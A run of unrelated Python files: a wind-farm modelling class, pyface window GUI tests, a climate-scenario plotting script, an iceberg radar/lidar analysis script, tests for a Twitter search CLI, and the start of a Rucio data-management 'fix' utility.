>>> WT3 = Curslack.addTurbine("C_WT3", x_horizontal=480886, y_vertical=4925166)
>>> WT4 = Curslack.addTurbine("C_MWT4",x_horizontal=480573, y_vertical=4925712)
>>> print(Curslack.distances())
Assets C_WT1 C_WT2 C_WT3 C_MWT4 C_MWT5
0 C_WT1 0.000000 293.388821 597.382624 405.202419 551.515186
1 C_WT2 293.388821 0.000000 306.602348 459.393078 421.808013
2 C_WT3 597.382624 306.602348 0.000000 629.352842 428.164688
3 C_MWT4 405.202419 459.393078 629.352842 0.000000 295.465734
4 C_MWT5 551.515186 421.808013 428.164688 295.465734 0.000000
\-----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
if len(assets)==0: #The user should give the set of turbines here, if not the function will calculate and return all the distances between all the turbines in that wind farm.
distancesDic={}
distancesDic["Assets"]=self.assets
for asset in self.assets:
distancesDic[asset] = []
for i in range(len(self.assets)):
deltax=globals()[asset].x_horizontal-globals()[self.assets[i]].x_horizontal
deltay=globals()[asset].y_vertical-globals()[self.assets[i]].y_vertical
distance=((deltax**2)+(deltay**2))**(0.5)
distancesDic[asset].append(distance)
df=pd.DataFrame(distancesDic)
return df
else: #This part will work for the user's given set of turbines manually
print("To be done for a given set of turbines' unique names")
return "Under development"
def coordinates(self, assets=[]):
"""
Returns the data frame with all assets' x and y coordinates if the assets list is empty, otherwise only for the given set of assets.
:param assets: [*opt*] Unique ID or object name of the assets
:Example:
>>> Curslack = windFarm("Curslack_farm")
>>> WT1 = Curslack.addTurbine("C_WT1", x_horizontal=480331, y_vertical=4925387)
>>> WT2 = Curslack.addTurbine("C_WT2", x_horizontal=480592, y_vertical=4925253)
>>> WT3 = Curslack.addTurbine("C_WT3", x_horizontal=480886, y_vertical=4925166)
>>> WT4 = Curslack.addTurbine("C_MWT4",x_horizontal=480573, y_vertical=4925712)
>>> print(Curslack.coordinates())
Assets x_coor y_coor
C_WT1 480331 4925387
C_WT2 480592 4925253
C_WT3 480886 4925166
C_MWT4 480573 4925712
C_MWT5 480843 4925592
\-----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
if len(assets) == 0:
coordinatesDic={}
coordinatesDic["Assets"]=["x_coor","y_coor"]
for asset in self.assets:
coordinatesDic[asset]=[globals()[asset].x_horizontal,globals()[asset].y_vertical]
toReturn=pd.DataFrame(coordinatesDic)
return toReturn.set_index('Assets').transpose()
else:
print("To be done for a given set of turbines' unique names")
return "Under development"
class SRT:
"""
Creates a single rotor turbine (SRT) object with the given unique name.
:param srtUniqueID: [*req*] Unique Id of the wind farm as a string.
:param diameter: [*opt*] diameter of the SRT.
:param hubHeight: [*opt*] hub height of the SRT.
:param x_horizontal: [*opt*] x coordinate of the SRT.
:param y_vertical: [*opt*] y coordinate of the SRT.
:Example:
>>> WT1=SRT("TheWT1",diameter=150)
>>> print(WT1.info)
Property Value
0 Unique Name TheWT1
1 Diameter 150
2 Area 17671.5
\-----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
created_SRTs=[]
def __init__(self,srtUniqueID,diameter=float("NaN"),hubHeigt=float("NaN"),x_horizontal=float("NaN"),y_vertical=float("NaN")):
SRT.created_SRTs.append(srtUniqueID)
self.uID = srtUniqueID
self.diameter=diameter
self.hubHeight=hubHeigt
self.x_horizontal=x_horizontal
self.y_vertical=y_vertical
self.area=0.25*np.pi*self.diameter**2
@property
def info(self):
"""
Returns a data frame containing information about the wind turbine.
:param None:
:Example:
>>> Curslack = windFarm("Curslack_farm")
>>> WT1 = Curslack.addTurbine("C_WT1", hubHeigt=120, diameter=120, x_horizontal=480331, y_vertical=4925387)
>>> print(WT1.info)
Property Value
0 Unique Name C_WT1
1 Diameter 120
2 Area 11309.7
\-----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
infoDic={"Property":["Unique Name", "Diameter", "Area"],"Value":[self.uID, self.diameter, self.area]}
return pd.DataFrame(infoDic)
class MRT(SRT):
pass
if __name__=='__main__': ##This section is made for tests. A more comprehensive test strategy will be developed later. Here the test can only check for syntax error, but to ensure script gives true resutls test mechanism should be developed.
Curslack = windFarm("Curslack_farm")
WT1 = Curslack.addTurbine("C_WT1", hubHeigt=120, diameter=120, x_horizontal=480331, y_vertical=4925387)
WT2 = Curslack.addTurbine("C_WT2", x_horizontal=480592, y_vertical=4925253)
WT3 = Curslack.addTurbine("C_WT3", x_horizontal=480886, y_vertical=4925166)
WT4 = Curslack.addTurbine("C_MWT4", turbineType="MRT", x_horizontal=480573, y_vertical=4925712)
WT5 = Curslack.addTurbine("C_MWT5", turbineType="MRT", x_horizontal=480843, diameter=450, y_vertical=4925592)
DanTysk=windFarm("Dantysk_name")
Env = environment("C_Env")
# Creates an environment without assigning it to any wind farm.
print(Env.makeSectors())
TheEnv_Dantysk = DanTysk.addEnvironment("D_env")
TheEnv_Dantysk.Airdensity = 1.225
print(TheEnv_Dantysk.Airdensity == D_env.Airdensity)
WT1 = DanTysk.addTurbine("D_WT1")
WT2 = DanTysk.addTurbine("D_WT2", diameter=120)
WT3 = DanTysk.addTurbine("D_WT3", x_horizontal=580592, y_vertical=5925253)
WT3.diameter = 150 # Assiging WT3 diameter after creation.
print(WT1 == D_WT1)
print(DanTysk.assets)
print(Curslack.coordinates())
print(Curslack.distances())
print(DanTysk.info)
|
<gh_stars>1-10
from __future__ import absolute_import
import platform
import unittest
from ..constant import CANCEL, NO, OK, YES
from ..toolkit import toolkit_object
from ..window import Window
is_qt = toolkit_object.toolkit == 'qt4'
if is_qt:
from pyface.qt import qt_api
GuiTestAssistant = toolkit_object('util.gui_test_assistant:GuiTestAssistant')
no_gui_test_assistant = (GuiTestAssistant.__name__ == 'Unimplemented')
ModalDialogTester = toolkit_object(
'util.modal_dialog_tester:ModalDialogTester'
)
no_modal_dialog_tester = (ModalDialogTester.__name__ == 'Unimplemented')
is_pyqt5 = (is_qt and qt_api == 'pyqt5')
is_pyqt4_linux = (is_qt and qt_api == 'pyqt' and platform.system() == 'Linux')
@unittest.skipIf(no_gui_test_assistant, 'No GuiTestAssistant')
class TestWindow(unittest.TestCase, GuiTestAssistant):
def setUp(self):
GuiTestAssistant.setUp(self)
self.window = Window()
def tearDown(self):
if self.window.control is not None:
with self.delete_widget(self.window.control):
self.window.destroy()
self.window = None
GuiTestAssistant.tearDown(self)
def test_destroy(self):
# test that destroy works even when no control
with self.event_loop():
self.window.destroy()
def test_open_close(self):
# test that opening and closing works as expected
with self.assertTraitChanges(self.window, 'opening', count=1):
with self.assertTraitChanges(self.window, 'opened', count=1):
with self.event_loop():
self.window.open()
with self.assertTraitChanges(self.window, 'closing', count=1):
with self.assertTraitChanges(self.window, 'closed', count=1):
with self.event_loop():
self.window.close()
def test_show(self):
# test that showing works as expected
with self.event_loop():
self.window._create()
with self.event_loop():
self.window.show(True)
with self.event_loop():
self.window.show(False)
with self.event_loop():
self.window.destroy()
def test_activate(self):
# test that activation works as expected
with self.event_loop():
self.window.open()
with self.event_loop():
self.window.activate()
with self.event_loop():
self.window.close()
def test_position(self):
# test that default position works as expected
self.window.position = (100, 100)
with self.event_loop():
self.window.open()
with self.event_loop():
self.window.close()
def test_reposition(self):
# test that changing position works as expected
with self.event_loop():
self.window.open()
with self.event_loop():
self.window.position = (100, 100)
with self.event_loop():
self.window.close()
def test_size(self):
# test that default size works as expected
self.window.size = (100, 100)
with self.event_loop():
self.window.open()
with self.event_loop():
self.window.close()
def test_resize(self):
# test that changing size works as expected
with self.event_loop():
self.window.open()
with self.event_loop():
self.window.size = (100, 100)
with self.event_loop():
self.window.close()
def test_title(self):
# test that default title works as expected
self.window.title = "Test Title"
with self.event_loop():
self.window.open()
with self.event_loop():
self.window.close()
def test_retitle(self):
# test that changing title works as expected
with self.event_loop():
self.window.open()
with self.event_loop():
self.window.title = "Test Title"
with self.event_loop():
self.window.close()
def test_show_event(self):
with self.event_loop():
self.window.open()
with self.event_loop():
self.window.visible = False
with self.assertTraitChanges(self.window, 'visible', count=1):
with self.event_loop():
self.window.control.show()
self.assertTrue(self.window.visible)
def test_hide_event(self):
with self.event_loop():
self.window.open()
with self.assertTraitChanges(self.window, 'visible', count=1):
with self.event_loop():
self.window.control.hide()
self.assertFalse(self.window.visible)
@unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
@unittest.skipIf(
is_pyqt5, "Confirmation dialog click tests don't work on pyqt5."
)
@unittest.skipIf(
is_pyqt4_linux,
"Confirmation dialog click tests don't work reliably on linux. Issue #282."
)
def test_confirm_reject(self):
# test that cancel works as expected
tester = ModalDialogTester(
lambda: self.window.confirm("message", cancel=True)
)
tester.open_and_run(when_opened=lambda x: x.close(accept=False))
self.assertEqual(tester.result, CANCEL)
@unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
@unittest.skipIf(
is_pyqt5, "Confirmation dialog click tests don't work on pyqt5."
)
@unittest.skipIf(
is_pyqt4_linux,
"Confirmation dialog click tests don't work reliably on linux. Issue #282."
)
def test_confirm_yes(self):
# test that yes works as expected
tester = ModalDialogTester(lambda: self.window.confirm("message"))
tester.open_and_wait(when_opened=lambda x: x.click_button(YES))
self.assertEqual(tester.result, YES)
@unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
@unittest.skipIf(
is_pyqt5, "Confirmation dialog click tests don't work on pyqt5."
)
@unittest.skipIf(
is_pyqt4_linux,
"Confirmation dialog click tests don't work reliably on linux. Issue #282."
)
def test_confirm_no(self):
# test that no works as expected
tester = ModalDialogTester(lambda: self.window.confirm("message"))
tester.open_and_wait(when_opened=lambda x: x.click_button(NO))
self.assertEqual(tester.result, NO)
@unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
@unittest.skipIf(
is_pyqt5, "Confirmation dialog click tests don't work on pyqt5."
)
@unittest.skipIf(
is_pyqt4_linux,
"Confirmation dialog click tests don't work reliably on linux. Issue #282."
)
def test_confirm_cancel(self):
# test that cncel works as expected
tester = ModalDialogTester(
lambda: self.window.confirm("message", cancel=True)
)
tester.open_and_wait(when_opened=lambda x: x.click_button(CANCEL))
self.assertEqual(tester.result, CANCEL)
@unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
def test_information_accept(self):
self._check_message_dialog_accept(self.window.information)
@unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
@unittest.skipIf(
is_pyqt5, "Message dialog click tests don't work on pyqt5."
)
@unittest.skipIf(
is_pyqt4_linux,
"Message dialog click tests don't work reliably on linux. Issue #282."
)
def test_information_ok(self):
self._check_message_dialog_ok(self.window.information)
@unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
def test_warning_accept(self):
self._check_message_dialog_accept(self.window.warning)
@unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
@unittest.skipIf(
is_pyqt5, "Message dialog click tests don't work on pyqt5."
)
@unittest.skipIf(
is_pyqt4_linux,
"Message dialog click tests don't work reliably on linux. Issue #282."
)
def test_warning_ok(self):
self._check_message_dialog_ok(self.window.warning)
@unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
def test_error_accept(self):
self._check_message_dialog_accept(self.window.error)
@unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
@unittest.skipIf(
is_pyqt5, "Message dialog click tests don't work on pyqt5."
)
@unittest.skipIf(
is_pyqt4_linux,
"Message dialog click tests don't work reliably on linux. Issue #282."
)
def test_error_ok(self):
self._check_message_dialog_ok(self.window.error)
def _check_message_dialog_ok(self, method):
tester = self._setup_tester(method)
tester.open_and_wait(when_opened=lambda x: x.click_button(OK))
self.assertIsNone(tester.result)
def _check_message_dialog_accept(self, method):
tester = self._setup_tester(method)
tester.open_and_run(when_opened=lambda x: x.close(accept=True))
self.assertIsNone(tester.result)
def _setup_tester(self, method):
kwargs = {
'title': 'Title',
'detail': 'Detail',
'informative': 'Informative'
}
tester = ModalDialogTester(lambda: method("message", **kwargs))
return tester
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 13 09:38:08 2021
@author: thedi
"""
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from climlib import *
#Do you want to plot the vanilla results, or the ones showing the vippepunkt?
#name = 'predicts.npy'
year_list = [2036, 2043, 2044, 2050]
cmap = matplotlib.cm.get_cmap('Accent')
alpha = 1
fig, axs = plt.subplots(nrows = 1, ncols = 3, figsize=(15,7))
plt.suptitle('Hva skjer hvis man bestemmer seg for å reversere utslippene i 2036, 2043, 2044 eller 2050?')
axs.flatten()
for i, year_thresh in enumerate(reversed(year_list)):
#load prediction models
name = 'predicts_vippepunkt_%s.npy'%year_thresh
predictions = np.load(name, allow_pickle = True)
#plot icelats and co2e levels
predmodel = predictions[3]
if year_thresh == 2044:
#plot icelats and co2e levels
axs[0].plot(predmodel.years, predmodel.co2e_array, color = cmap(i/len(year_list)), linestyle = '--', label = 'Revers i %s'%year_thresh, alpha = alpha)
axs[1].plot(predmodel.co2e_array, predmodel.icelat, color = cmap(i/len(year_list)), linestyle = '--', label = 'Revers i %s'%year_thresh, alpha = alpha)
axs[2].plot(predmodel.years, predmodel.icelat, color = cmap(i/len(year_list)), linestyle = '--', label = 'Revers i %s'%year_thresh, alpha = alpha)
#plot decorations
axs[1].annotate(text = 'isfritt', xy=(predmodel.co2e_array[2060-2021], predmodel.icelat[2060-2021]), xytext=(predmodel.co2e_array[2060-2021], predmodel.icelat[2060-2021]-0.7))
axs[2].annotate(text = 'isfritt', xy=(predmodel.years[2060-2021], predmodel.icelat[2060-2021]), xytext=(predmodel.years[2060-2021]-5, predmodel.icelat[2060-2021]-0.7))
else:
#plot icelats and co2e levels
axs[0].plot(predmodel.years, predmodel.co2e_array, color = cmap(i/len(year_list)), linestyle = '-', label = 'Revers i %s'%year_thresh, alpha = alpha)
axs[1].plot(predmodel.co2e_array, predmodel.icelat, color = cmap(i/len(year_list)), linestyle = '-', label = 'Revers i %s'%year_thresh, alpha = alpha)
axs[2].plot(predmodel.years, predmodel.icelat, color = cmap(i/len(year_list)), linestyle = '-', label = 'Revers i %s'%year_thresh, alpha = alpha)
#plot decorations
max_co2_i = np.argmax(predmodel.co2e_array)
axs[0].plot(predmodel.years[max_co2_i], predmodel.co2e_array[max_co2_i], 'ko')
axs[0].annotate(text = int(year_thresh), xy=(predmodel.years[max_co2_i], predmodel.co2e_array[max_co2_i]), xytext=(predmodel.years[max_co2_i]+4, predmodel.co2e_array[max_co2_i]-3))
axs[0].scatter(predmodel.years[-1], predmodel.co2e_array[-1], color = cmap(i/len(year_list)), linestyle = 'dotted')
axs[1].scatter(predmodel.co2e_array[-1], predmodel.icelat[-1], color = cmap(i/len(year_list)), linestyle = 'dotted')
axs[2].scatter(predmodel.years[-1], predmodel.icelat[-1], color = cmap(i/len(year_list)), linestyle = 'dotted')
#plot decorations
axs[0].plot(predmodel.years[0], predmodel.co2e_array[0], 'ko')
axs[1].plot(predmodel.co2e_array[0], predmodel.icelat[0], 'ko')
axs[2].plot(predmodel.years[0], predmodel.icelat[0], 'ko')
axs[0].annotate(text = 'Dagens nivå', xy=(predmodel.years[0], predmodel.co2e_array[0]), xytext=(predmodel.years[0]-1, predmodel.co2e_array[0]-7))
axs[1].annotate(text = 'Dagens nivå', xy=(predmodel.co2e_array[0], predmodel.icelat[0]), xytext=(predmodel.co2e_array[0]+7, predmodel.icelat[0]-0.2))
axs[2].annotate(text = 'Dagens nivå', xy=(predmodel.years[0], predmodel.icelat[0]), xytext=(predmodel.years[0]+4, predmodel.icelat[0]-0.2))
axs[0].set_xlim(2015,2165)
axs[2].set_xlim(2015,2165)
axs[1].set_ylim(70,91)
axs[0].set_xlabel('År')
axs[0].set_ylabel('CO2e-nivåer [ppm]')
axs[1].set_xlabel('CO2e-nivåer [ppm]')
axs[1].set_ylabel('Iskant [breddegrad]')
axs[2].set_xlabel('År')
axs[2].set_ylabel('Iskant [breddegrad]')
axs[0].legend()
axs[1].legend()
axs[2].legend()
axs[0].grid()
axs[1].grid()
axs[2].grid()
fig.tight_layout()
fig.show() |
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Application to find icebergs and their towing ability
Author: <NAME>
Created on Wed Jan 9 00:01:25 2019
"""
""" Modules imported for the application"""
import csv # to read radar and lidar data
import matplotlib.pyplot as plt #to display radar and lidar data
import numpy as np #to convert list to array
"""Extract Radar data
Rdar data is saved from an html as a text file. It is then extracted using csv
reader code and the data is inserted into an empty list, which represents the
pixel values as 2D array
"""
sea = [] #create an empty list for creating sea environment
#extract values from radar file using csv reader code
with open ('white1.radar.txt') as rdr:
radar = csv.reader(rdr, quoting=csv.QUOTE_NONNUMERIC)#convert values to float
for row in radar:
rowlist = []
for value in row:
rowlist.append(value)
sea.append(rowlist) #creates a 2D list with radar pixel values
#print(sea)
""" Finding icebergs
Each iceberg is located based on their starting and ending row and column indexes
A value of 100 or above is assigned to be iceberg. To prevent edge effects the
indexes start from 1 and stops at 1 value before th length of the area
"""
# extract each iceberg
iceberg= []
icebergStartCol = []
icebergEndCol = []
icebergStartRow = []
icebergEndCol = []
value0 = 0.0
onBergLeft = False
onBergRight = False
onBergAbove = False
onBergBelow = False
onBerg = False
for rowindex in range(1, len(sea) - 1): #index value for rows within range 1 to 299
rowabove = sea[rowindex - 1] #rows above iceberg
row = sea[rowindex]
rowbelow = sea[rowindex + 1] #rows below iceberg
for colindex in range(1, len(row) - 1): #index value for column
value = row[colindex - 1]
if (100 <= value <= 256):
onBergLeft = True
else:
onBergLeft = False
#Right
value = row[colindex + 1]
if (100 <= value <= 256):
onBergRight = True
else:
onBergRight = False
#Above
value = rowabove[colindex]
if (100 <= value <= 256):
onBergAbove = True
else:
onBergAbove = False
#Below
value = rowbelow[colindex]
if (100 <= value <= 256):
onBergBelow = True
else:
onBergBelow = False
#Cell
value = row[colindex]
if (100 <= value <= 256):
onBerg = True
else:
onBerg = False
if (onBerg):
if (onBergRight == False):
icebergendcolindex = colindex
if (onBergLeft == False):
icebergstartcolindex = colindex
if (onBergAbove == False):
icebergstartrowindex = rowindex
if (onBergBelow == False):
icebergendrowindex = rowindex
#prints the value of range of iceberg index
print("icebergstartrowindex ", icebergstartrowindex)
print("icebergstartcolindex", icebergstartcolindex)
print("icebergendrowindex", icebergendrowindex)
print("icebergendcolindex", icebergendcolindex)
"""Extract lidar data using csv reader code
Lidar data is also stored as text file from an html source. It is extracted as a
2D list ino a file named: lidar_sea
"""
with open('white1.lidar.txt') as ldr:
lidar = csv.reader(ldr, quoting=csv.QUOTE_NONNUMERIC)
lidar_sea = []
for row in lidar:
list_row = []
for value in row:
list_row.append(value)
lidar_sea.append(list_row)
#print(lidar_sea)
""" Display the radar and lidar data as images
The radar and lidar data imported above are displayed using matplotlib.pyplot
module. They are displayed as images and icebergs are marked in them
"""
#plot an image of sea with iceberg using radar data
plt.subplot(1,2,1) #making 1X2 subplot
plt.ylim(0,300) #set the y axis in plot
plt.xlim(0,300)#set the x axis in plot
plt.text(200,220, 'Sea',fontsize=12)
#annotate for showing the iceberg with an arrow
plt.annotate("Iceberg", xy=(155,145), xytext=(180,100), arrowprops=dict(facecolor="red" ))
plt.title('Radar image of a sea with iceberg',fontsize=12,fontname='Times New Roman')
plt.imshow(sea, 'Blues_r')#display an image of sea using blue and white colour
#plot an image of a sea with iceberg using lidar data
plt.subplot(1,2,2)
plt.ylim(0,300) #set the y axis in plot
plt.xlim(0,300)#set the x axis in plot
plt.text(200,220, 'Sea',fontsize=12)
plt.annotate("Iceberg", xy=(155,145), xytext=(180,100), arrowprops=dict(facecolor="red" ))
plt.title('Lidar image of a sea with iceberg',fontsize=12,fontname='Times New Roman')
plt.imshow(lidar_sea, 'Blues_r')#display an image of sea using blue and white colour
plt.tight_layout()
plt.show()
"""Pulling out the height of iceberg from lidar data
By using pixel indexes from radar data, the height values of the iceberg is pulled
out of the lidar data for future calculation
"""
#convert the lidar data to 2D array
np_lidar_sea = np.array(lidar_sea,dtype=int)
#print(np_lidar_sea)
#mask iceberg from the np_array
iceberg = np_lidar_sea[icebergstartrowindex:icebergendrowindex+1, icebergstartcolindex:icebergendcolindex+1]
#iceberg = np_lidar_sea[135:166, 135:166]
#print(iceberg) #show only the pixel values of the iceberg
""" The volume of iceberg calculation from lidar pixel values
1 unit of lidar data represents 10 cm of height of iceberg. 10 units of lidar value,
represents 1m in height. So the pixel values are multiplied
by 0.1, to get height in meter. The area of iceberg is 1m2, as each pixel has
length and breadth of 1 meter.The volume is calculated from area multiplied
by height. The total volume of iceberg is obtained from adding up individual
element from the iceberg volume list
"""
iceberg_vol_m3 = [] #list of iceberg volume in m3
for i in iceberg:
rowlist = []
for j in i:
rowlist.append(j*0.1*1) #calculate volume by using volume = heightXarea
iceberg_vol_m3.append(rowlist)
total_iceberg_vol = 0.0
for row in iceberg_vol_m3:
for element in row:
total_iceberg_vol += element
print("Total iceberg volume:", total_iceberg_vol,"m3")
"""Calculation of iceberg mass above sea level
For mass calculation the equation used is mass = density * volume
The density of iceberg is 900kg/m3
"""
iceberg_mass = total_iceberg_vol*900 #iceberg_mass_above water
"""Total iceberg mass calculation
Assuming only 10% of the ice is above sea level, the total iceber mass is assessed
fromt he iceberg mass
"""
total_iceberg_mass = iceberg_mass * 10 #considering 10% mass above water
print("Total iceberg mass:", total_iceberg_mass,"kg")
""" Assessing iceberg towing ability
Iceberg can be drag out in time if its mass is below 36million kg
"""
Towing_ability = True
if total_iceberg_mass >= 36000000:
print("Dragging iceberg is not possible")
else:
print("Dragging iceberg is possible")
|
#
# Copyright 2019-2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from datetime import date
from logging import getLogger
from pathlib import Path
from typing import List, Mapping, Optional, Sequence, Type
import pytest
from _pytest.capture import CaptureFixture
from _pytest.monkeypatch import MonkeyPatch
from typing_extensions import Final
from nasty import main
from nasty.batch.batch import Batch
from nasty.request.replies import Replies
from nasty.request.request import DEFAULT_BATCH_SIZE, DEFAULT_MAX_TWEETS, Request
from nasty.request.search import DEFAULT_FILTER, DEFAULT_LANG, Search, SearchFilter
from nasty.request.thread import Thread
from .mock_context import MockRequestContext
logger = getLogger(__name__)
REQUESTS: Final[Mapping[Type[Request], Sequence[Request]]] = {
Search: [
Search("trump"),
Search("<NAME>"),
Search("trump", since=date(2019, 3, 21), until=date(2019, 3, 22)),
Search("trump", filter_=SearchFilter.LATEST),
Search("trump", lang="de"),
Search("trump", max_tweets=17, batch_size=71),
Search("trump", max_tweets=None, batch_size=DEFAULT_BATCH_SIZE),
],
Replies: [
Replies("332308211321425920"),
Replies("332308211321425920", max_tweets=17, batch_size=71),
Replies("332308211321425920", max_tweets=None, batch_size=DEFAULT_BATCH_SIZE),
],
Thread: [
Thread("332308211321425920"),
Thread("332308211321425920", max_tweets=17, batch_size=71),
Thread("332308211321425920", max_tweets=None, batch_size=DEFAULT_BATCH_SIZE),
],
}
ALL_REQUESTS: Final[Sequence[Request]] = [
request for requests_for_type in REQUESTS.values() for request in requests_for_type
]
def _make_args( # noqa: C901
request: Request,
to_batch: Optional[Path] = None,
daily: bool = False,
) -> Sequence[str]:
args: List[str] = []
if isinstance(request, Search):
args += ["search", "--query", request.query]
if request.since:
args += ["--since", request.since.strftime("%Y-%m-%d")]
if request.until:
args += ["--until", request.until.strftime("%Y-%m-%d")]
if request.filter != DEFAULT_FILTER:
args += ["--filter", request.filter.name]
if request.lang != DEFAULT_LANG:
args += ["--lang", request.lang]
elif isinstance(request, Replies):
args += ["replies", "--tweet-id", request.tweet_id]
elif isinstance(request, Thread):
args += ["thread", "--tweet-id", request.tweet_id]
else:
raise ValueError("Unimplemented Request subclass: {}.".format(type(request)))
if request.max_tweets is None:
args += ["--max-tweets", "-1"]
elif request.max_tweets != DEFAULT_MAX_TWEETS:
args += ["--max-tweets", str(request.max_tweets)]
if request.batch_size != DEFAULT_BATCH_SIZE:
args += ["--batch-size", str(request.batch_size)]
if to_batch is not None:
args += ["--to-batch", str(to_batch)]
if daily:
if not isinstance(request, Search):
raise ValueError("daily can only be used for Search-requests.")
args += ["--daily"]
return args
@pytest.mark.parametrize("request_", ALL_REQUESTS, ids=repr)
def test_correct_call(
request_: Request, monkeypatch: MonkeyPatch, capsys: CaptureFixture
) -> None:
mock_context: MockRequestContext = MockRequestContext()
monkeypatch.setattr(
type(request_), request_.request.__name__, mock_context.mock_request
)
main(*_make_args(request_))
assert mock_context.request == request_
assert not mock_context.remaining_result_tweets
assert capsys.readouterr().out == ""
@pytest.mark.parametrize("num_results", [5, 10, 20], ids=repr)
@pytest.mark.parametrize(
"request_",
[
Search("trump", max_tweets=10),
Replies("332308211321425920", max_tweets=10),
Thread("332308211321425920", max_tweets=10),
],
ids=repr,
)
def test_correct_call_results(
request_: Request,
num_results: int,
monkeypatch: MonkeyPatch,
capsys: CaptureFixture,
) -> None:
mock_context: MockRequestContext = MockRequestContext(num_results=num_results)
monkeypatch.setattr(
type(request_), request_.request.__name__, mock_context.mock_request
)
main(*_make_args(request_))
assert mock_context.request == request_
assert not mock_context.remaining_result_tweets
assert capsys.readouterr().out == (
json.dumps(mock_context.RESULT_TWEET.to_json()) + "\n"
) * min(10, num_results)
@pytest.mark.parametrize("request_", ALL_REQUESTS, ids=repr)
def test_correct_call_to_batch(
request_: Request,
capsys: CaptureFixture,
tmp_path: Path,
) -> None:
batch_file = tmp_path / "batch.jsonl"
main(*_make_args(request_, to_batch=batch_file))
assert capsys.readouterr().out == ""
batch = Batch()
batch.load(batch_file)
assert len(batch) == 1
assert batch[0].request == request_
assert batch[0].id
assert batch[0].completed_at is None
assert batch[0].exception is None
@pytest.mark.parametrize(
"old_request,new_request",
[
(REQUESTS[Search][0], REQUESTS[Search][1]),
(REQUESTS[Replies][0], REQUESTS[Replies][1]),
(REQUESTS[Thread][0], REQUESTS[Thread][1]),
],
ids=repr,
)
def test_correct_call_to_batch_exists(
old_request: Request,
new_request: Request,
capsys: CaptureFixture,
tmp_path: Path,
) -> None:
batch_file = tmp_path / "batch.jsonl"
batch = Batch()
batch.append(old_request)
batch.dump(batch_file)
main(*_make_args(new_request, to_batch=batch_file))
assert capsys.readouterr().out == ""
batch = Batch()
batch.load(batch_file)
assert len(batch) == 2
for batch_entry, expected_request in zip(batch, [old_request, new_request]):
assert batch_entry.request == expected_request
assert batch_entry.id
assert batch_entry.completed_at is None
assert batch_entry.exception is None
def test_correct_call_to_batch_daily(capsys: CaptureFixture, tmp_path: Path) -> None:
batch_file = tmp_path / "batch.jsonl"
request = Search("trump", since=date(2019, 1, 1), until=date(2019, 2, 1))
# Needed for type checking.
assert request.until is not None and request.since is not None
main(*_make_args(request, to_batch=batch_file, daily=True))
assert capsys.readouterr().out == ""
batch = Batch()
batch.load(batch_file)
assert len(batch) == (request.until - request.since).days
for batch_entry, expected_request in zip(batch, request.to_daily_requests()):
assert batch_entry.request == expected_request
assert batch_entry.id
assert batch_entry.completed_at is None
assert batch_entry.exception is None
|
<filename>admix/fix.py
import os
import time
import shutil
from argparse import ArgumentParser
import admix.helper.helper as helper
from admix import DEFAULT_CONFIG, __version__
from admix.interfaces.rucio_summoner import RucioSummoner
from admix.interfaces.database import ConnectMongoDB
from admix.utils.naming import make_did
from admix.utils.list_file_replicas import list_file_replicas
from utilix.config import Config
import utilix
from bson.json_util import dumps
from datetime import timezone, datetime, timedelta
import pymongo
class Fix():
def __init__(self):
#Take all data types categories
self.NORECORDS_DTYPES = helper.get_hostconfig()['norecords_types']
self.RAW_RECORDS_DTYPES = helper.get_hostconfig()['raw_records_types']
self.RECORDS_DTYPES = helper.get_hostconfig()['records_types']
#Choose which data type you want to treat
self.DTYPES = self.NORECORDS_DTYPES + self.RECORDS_DTYPES + self.RAW_RECORDS_DTYPES
#Take the list of all XENON RSEs
self.RSES = helper.get_hostconfig()['rses']
#Take the RSE that is used to perform the upload
self.UPLOAD_TO = helper.get_hostconfig()['upload_to']
#Init the runDB
self.db = ConnectMongoDB()
#Init Rucio for later uploads and handling:
self.rc = RucioSummoner()
#Rucio Rule assignment priority
self.priority = 3
def reset_upload(self,did):
hash = did.split('-')[-1]
dtype = did.split('-')[0].split(':')[-1]
number = int(did.split(':')[0].split('_')[-1])
print("Resetting the upload associated to the DID: {0}".format(did))
print("Run number: {0}".format(number))
print("Data type: {0}".format(dtype))
print("Hash: {0}".format(hash))
run = self.db.db.find_one({'number' : number})
# Gets the status
if 'status' in run:
print('Run status: {0}'.format(run['status']))
else:
print('Run status: {0}'.format('Not available'))
# Extracts the correct Event Builder machine who processed this run
# Then also the bootstrax state and, in case it was abandoned, the reason
if 'bootstrax' in run:
bootstrax = run['bootstrax']
eb = bootstrax['host'].split('.')[0]
else:
print('Not processed')
return(0)
# Get the EB datum and its status
ebstatus = ""
datum = None
for d in run['data']:
if d['type'] == dtype and eb in d['host']:
datum = d
if 'status' in d:
ebstatus = d['status']
if datum is None:
print('There is no EB datum. No reset is possible')
return(0)
if ebstatus != "":
print('EB status: {0}'.format(ebstatus))
else:
print('EB status: not available')
# Step zero (normally not needed): change the run status to "transferring"
# self.db.db.find_one_and_update({'number':number},{'$set':{"status": "transferring"}})
# First action: remove the files stored in datamanager
files = list_file_replicas(number, dtype, hash, self.UPLOAD_TO)
print("Deleting rucio data in datamanager disk. Deleting",len(files),"files")
for file in files:
try:
os.remove(file)
except:
print("File: {0} not found".format(file))
# Second action: remove the LNGS Rucio rule
